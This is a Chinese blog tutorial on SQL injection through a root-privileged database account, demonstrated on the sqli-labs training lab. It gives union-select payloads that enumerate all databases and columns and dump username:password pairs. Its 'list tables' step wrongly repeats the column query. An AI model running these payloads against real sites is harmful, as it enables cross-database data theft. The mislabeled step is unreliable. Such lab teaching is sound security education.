SQL注入 高权限注入(引入概念)

一、什么是高权限注入?

高权限注入,顾名思义,是指利用数据库的高权限账户(如 root),在存在注入漏洞的情况下,不仅可以操作当前数据库,还能跨库访问和操作服务器上所有数据库的数据。
高权限与低权限的区别:

  • 高权限(如 root 用户):
    • 拥有整个数据库服务器的操作和控制权
    • 可访问、修改、删除所有数据库和表的数据
  • 低权限(普通用户):
    • 权限受限,只能访问指定数据库、表或字段
  • 可能仅有部分查询权限,无法进行数据的增删改
    举例说明:
  • 一个服务器上有多个网站,每个网站各自拥有独立的数据库。
  • 如果网站A存在注入漏洞,且其数据库连接账户为 root,那么攻击者可通过漏洞跨库访问网站B、C等其他数据库的数据。

二、数据库权限层级结构

我们现在依旧可以在 sqli-labs 的第二关来找一下信息

可以看到这边我们是 root 的身份,那我们现在打开源代码看一下这是怎么赋予 root 身份的

这边可以看到 include 了一个外部的文件,这是我们连接 mysql 的配置文件,我们去找一下

这边你又会发现,这里又引入了一个外部的文件,一层包着一层的

这就是 root 权限的由来。
数据库中的权限控制通常分为以下几个层级:

  1. User 表:全局最高权限(root 用户)
  2. Db 表:指定数据库的权限
  3. Tables 表:指定表的权限
  4. Columns 表:指定字段的权限
    权限验证流程:
  • 系统依次检查 user → db → tables → columns 四张表
  • 只要上层权限为 Y(yes),则无需继续往下检查
  • 权限为 N(no)时,才会继续往下级表查找具体权限

三、实操演示:高权限与低权限账户的创建与权限分配

依旧是


1. 查询当前数据库用户及权限:

复制代码
SELECT user, host FROM mysql.user;

查看有哪些用户

复制代码
select * from user where user='root' and host='localhost' \G;


这边你就能知道哪些权限在root身份下是开着的了


四、高权限注入实战流程

前提条件:

  • 数据库连接账户为 root(高权限)
  • 存在 SQL 注入漏洞
    注入流程:
  1. 判断是否存在注入点
  • 通过输入异常值、报错信息等方式检测
  1. 确定字段数量
  • 使用 order by 语句测试字段数
  1. 联合查询注入
  • 使用 union select 构造注入语句
  1. 查询所有数据库名

    id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

  • 可获取服务器下所有数据库
  1. 查询指定数据库下所有表名

    id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273

  • 注意:'users' 可用 16 进制表示,防止编码问题 0x7573657273
    以上就是我们等到的表名
  1. 查询表内所有字段名

    id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273

  2. 查询表内具体数据

    id=-1 union select 1,concat(username,0x3a,password),3 from security.users

  • 建议使用 库名.表名 精确指定,避免同名表混淆

这个帖子其实和手工注入没有什么差别,就是提了一下高权限注入的概念

相关推荐
iuvtsrt14 分钟前
存储过程如何处理海量数据的批处理_循环提交与分段LIMIT结合
jvm·数据库·python
yexuhgu18 分钟前
SQL如何检查字符串是否存在:INSTR与LOCATE函数使用
jvm·数据库·python
2301_7838486523 分钟前
SQL如何用SQL子查询实现关联报表生成_嵌套逻辑关联多表
jvm·数据库·python
高锰酸钾_33 分钟前
计算机网络-链路层-差错控制
服务器·网络·计算机网络
代码中介商34 分钟前
Libevent实战:高性能网络编程指南
linux·运维·网络
怀旧,1 小时前
【Linux网络编程】2. Socket编程 UDP
linux·网络·udp
liulilittle1 小时前
TCP UCP v1.0:BBR 的非破坏性约束层
网络·c++·网络协议·tcp/ip·算法·c·通信
techdashen1 小时前
dial9:给 Tokio 装上“飞行记录仪“
java·数据库·redis
2501_901006471 小时前
Golang怎么用gRPC Gateway_Golang gRPC Gateway教程【经典】
jvm·数据库·python
2501_901200531 小时前
golang如何实现错误预算Error Budget计算_golang错误预算Error Budget计算实现实战
jvm·数据库·python